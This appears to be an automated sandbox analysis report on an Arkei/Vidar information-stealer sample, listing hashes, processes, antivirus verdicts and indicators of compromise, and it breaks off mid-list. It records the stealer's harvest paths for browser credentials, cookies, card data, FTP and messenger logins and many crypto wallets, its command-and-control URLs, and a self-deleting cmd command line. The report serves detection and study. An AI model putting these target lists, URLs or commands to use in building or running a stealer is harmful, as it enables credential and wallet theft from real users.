- * ID: 1234
- * MalFamily: "Arkei"
- * MalScore: 10.0
- * File Name: "Exes_21f7a26bb9e91117169edfd7d3967cfb.exe"
- * File Size: 1338368
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "7716c84415ccd122f0ad35d15a26b63f09956202c4bb1004e31a5952c771df83"
- * MD5: "21f7a26bb9e91117169edfd7d3967cfb"
- * SHA1: "89448a5b10e160ccfe85138944a2ff3f988d51b8"
- * SHA512: "8e92478041ec3a504b7b59158bfcd6b7bacb21c1c8990be379e0a4099c8a38764ee7a42ccf74b3fff3b57f8464eab2793cbceab516317c5b34164d6f10f59221"
- * CRC32: "83995902"
- * SSDEEP: "24576:0FooK+7+Qu5HwaFQWC+2tiuxkmPzqPJ9EPZadN1vL9wC7AU6nxpbdK:CKYl0HwaCWC+2AatPzqPJ4QXHc7"
- * Process Execution:
- "9z25yPQnjM.exe",
- "9z25yPQnjM.exe",
- "cmd.exe",
- "taskkill.exe",
- "services.exe",
- "lsass.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "taskeng.exe",
- "taskeng.exe",
- "msoia.exe",
- "msoia.exe",
- "taskeng.exe",
- "WMIADAP.exe"
- * Executed Commands:
- "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe",
- "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit",
- "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit",
- "C:\\Windows\\system32\\lsass.exe",
- "taskkill /im 9z25yPQnjM.exe /f",
- "taskeng.exe 211F1106-53AB-4021-868B-2F49FACAB8E4 S-1-5-18:NT AUTHORITY\\System:Service:",
- "taskeng.exe D7A509EA-AB99-4E2A-B99E-04EE4FF35A33 S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
- "taskeng.exe 6E5C69F1-55AA-4A7A-B970-656893D7C708 S-1-5-18:NT AUTHORITY\\System:Service:",
- "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
- "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
- "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
- "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Anomalous file deletion behavior detected (10+)",
- "Details":
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\426A.tmp"
- "DeletedFile": "C:\\ProgramData\\freebl3.dll"
- "DeletedFile": "C:\\ProgramData\\mozglue.dll"
- "DeletedFile": "C:\\ProgramData\\msvcp140.dll"
- "DeletedFile": "C:\\ProgramData\\nss3.dll"
- "DeletedFile": "C:\\ProgramData\\softokn3.dll"
- "DeletedFile": "C:\\ProgramData\\vcruntime140.dll"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\screenshot.jpg"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DashCore"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\GoldCoinGLD"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IOCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\JAXX"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MultiDoge"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Zcash"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets"
- "DeletedFile": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\US_00000000-0000-0000-0000-0000000000009253538962.zip"
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe"
- "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- "Description": "Guard pages use detected - possible anti-debugging.",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "taskeng.exe tried to sleep 421 seconds, actually delayed analysis time by 0 seconds"
- "Process": "WmiPrvSE.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url_ioc": "dersed.com:80//288"
- "url_ioc": "dersed.com:80//freebl3.dll"
- "url_ioc": "dersed.com:80//mozglue.dll"
- "url_ioc": "dersed.com:80//msvcp140.dll"
- "url_ioc": "dersed.com:80//nss3.dll"
- "url_ioc": "dersed.com:80//softokn3.dll"
- "url_ioc": "dersed.com:80//vcruntime140.dll"
- "url_ioc": "ip-api.com:80//line/"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "9z25yPQnjM.exe -> C:\\Windows\\System32\\cmd.exe"
- "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "suspicious_request_iocs": "http://dersed.com/288"
- "suspicious_request_iocs": "http://dersed.com/freebl3.dll"
- "suspicious_request_iocs": "http://dersed.com/mozglue.dll"
- "suspicious_request_iocs": "http://dersed.com/msvcp140.dll"
- "suspicious_request_iocs": "http://dersed.com/nss3.dll"
- "suspicious_request_iocs": "http://dersed.com/softokn3.dll"
- "suspicious_request_iocs": "http://dersed.com/vcruntime140.dll"
- "suspicious_request_iocs": "http://ip-api.com/line/"
- "suspicious_request_iocs": "http://dersed.com/"
- "Description": "Performs some HTTP requests",
- "Details":
- "url_iocs": "http://dersed.com/288"
- "url_iocs": "http://dersed.com/freebl3.dll"
- "url_iocs": "http://dersed.com/mozglue.dll"
- "url_iocs": "http://dersed.com/msvcp140.dll"
- "url_iocs": "http://dersed.com/nss3.dll"
- "url_iocs": "http://dersed.com/softokn3.dll"
- "url_iocs": "http://dersed.com/vcruntime140.dll"
- "url_iocs": "http://ip-api.com/line/"
- "url_iocs": "http://dersed.com/"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: .rsrc, entropy: 7.94, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x000dd400, virtual_size: 0x000dd3c8"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
- "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
- "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
- "Description": "Behavioural detection: Injection (Process Hollowing)",
- "Details":
- "Injection": "9z25yPQnjM.exe(3892) -> 9z25yPQnjM.exe(1328)"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "9z25yPQnjM.exe(3892) -> 9z25yPQnjM.exe(1328)"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Behavioural detection: Injection (inter-process)",
- "Details":
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "File has been identified by 37 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Trojan.GenericKD.32391018"
- "McAfee": "Artemis!21F7A26BB9E9"
- "CrowdStrike": "win/malicious_confidence_100% (W)"
- "BitDefender": "Trojan.GenericKD.32391018"
- "K7GW": "Riskware ( 0040eff71 )"
- "K7AntiVirus": "Riskware ( 0040eff71 )"
- "TrendMicro": "Mal_HPGen-37b"
- "Symantec": "ML.Attribute.HighConfidence"
- "ESET-NOD32": "a variant of Win32/GenKryptik.DSFF"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "GData": "Win32.Trojan-Stealer.Vidar.HFQMXD"
- "Kaspersky": "Trojan.Win32.Chapak.dywh"
- "Avast": "FileRepMetagen Malware"
- "Endgame": "malicious (high confidence)"
- "Sophos": "Mal/Generic-S"
- "F-Secure": "Trojan.TR/Chapak.pfzxh"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.tc"
- "Trapmine": "suspicious.low.ml.score"
- "FireEye": "Generic.mg.21f7a26bb9e91117"
- "Emsisoft": "Trojan.GenericKD.32391018 (B)"
- "Avira": "TR/Chapak.pfzxh"
- "Microsoft": "Trojan:Win32/Tiggre!plock"
- "Arcabit": "Trojan.Generic.D1EE3F6A"
- "AegisLab": "Trojan.Win32.Chapak.4!c"
- "ZoneAlarm": "Trojan.Win32.Chapak.dywh"
- "Acronis": "suspicious"
- "VBA32": "BScope.TrojanPSW.Zbot"
- "Ad-Aware": "Trojan.GenericKD.32391018"
- "Malwarebytes": "Spyware.PredatorTheThief"
- "TrendMicro-HouseCall": "Mal_HPGen-37b"
- "Rising": "Trojan.Generic@ML.89 (RDML:DwZEfvt+IvzJSolmz/PxXA)"
- "Ikarus": "Trojan.Crypt"
- "Fortinet": "W32/Kryptik.GVSM!tr"
- "AVG": "FileRepMetagen Malware"
- "Qihoo-360": "Win32/Trojan.abe"
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\\\x12"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\\\x12"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\\n"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Litecoin\\*.*"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\NameCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\TerraCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\PrimeCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FreiCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DevCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Franko\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MegaCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\InfiniteCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\IxCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Anoncoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\BBQCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\DigitalCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\MinCoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
- "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\YACoin\\*.*"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
- "file": "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\FlorinCoin\\*.*"
- "Description": "Harvests credentials from local FTP client software",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
- "Description": "Uses suspicious command line tools or Windows utilities",
- "Details":
- "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
- "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im 9z25yPQnjM.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\9z25yPQnjM.exe & exit"
- "command": "taskkill /im 9z25yPQnjM.exe /f"
- * Started Service:
- "VaultSvc"
- * Mutexes:
- "Local\\_!MSFTHISTORY!_",
- "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
- "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
- "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
- "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
- "Global\\ADAP_WMI_ENTRY",
- "Global\\RefreshRA_Mutex",
- "Global\\RefreshRA_Mutex_Lib",
- "Global\\RefreshRA_Mutex_Flag"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
- "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\passwords.txt",
- "C:\\ProgramData\\freebl3.dll",
- "C:\\ProgramData\\mozglue.dll",
- "C:\\ProgramData\\msvcp140.dll",
- "C:\\ProgramData\\nss3.dll",
- "C:\\ProgramData\\softokn3.dll",
- "C:\\ProgramData\\vcruntime140.dll",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\ld",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\historych",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\History\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Downloads\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\c",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\wd",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Autofill\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\CC\\Google Chrome_Default.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Soft\\Authy\\\\xef\\x94\\x98\\xcd\\xb4\\xef\\x93\\x94\\x18\\xe3\\xa2\\x9e\\xe7\\x9c\\x86\\xc4\\xb8\\xc8\\x82",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\IE_Cookies.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Cookies\\Edge_Cookies.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\cookie_list.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\information.txt",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Bitcoin\\\\x12",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Ethereum\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Electrum\\\n",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectrumLTC\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus\\\n",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\Exodus\\",
- "C:\\ProgramData\\OT8YWWMZZY2TIFRXI1A5L8FQY\\files\\Wallets\\ElectronCash\\",
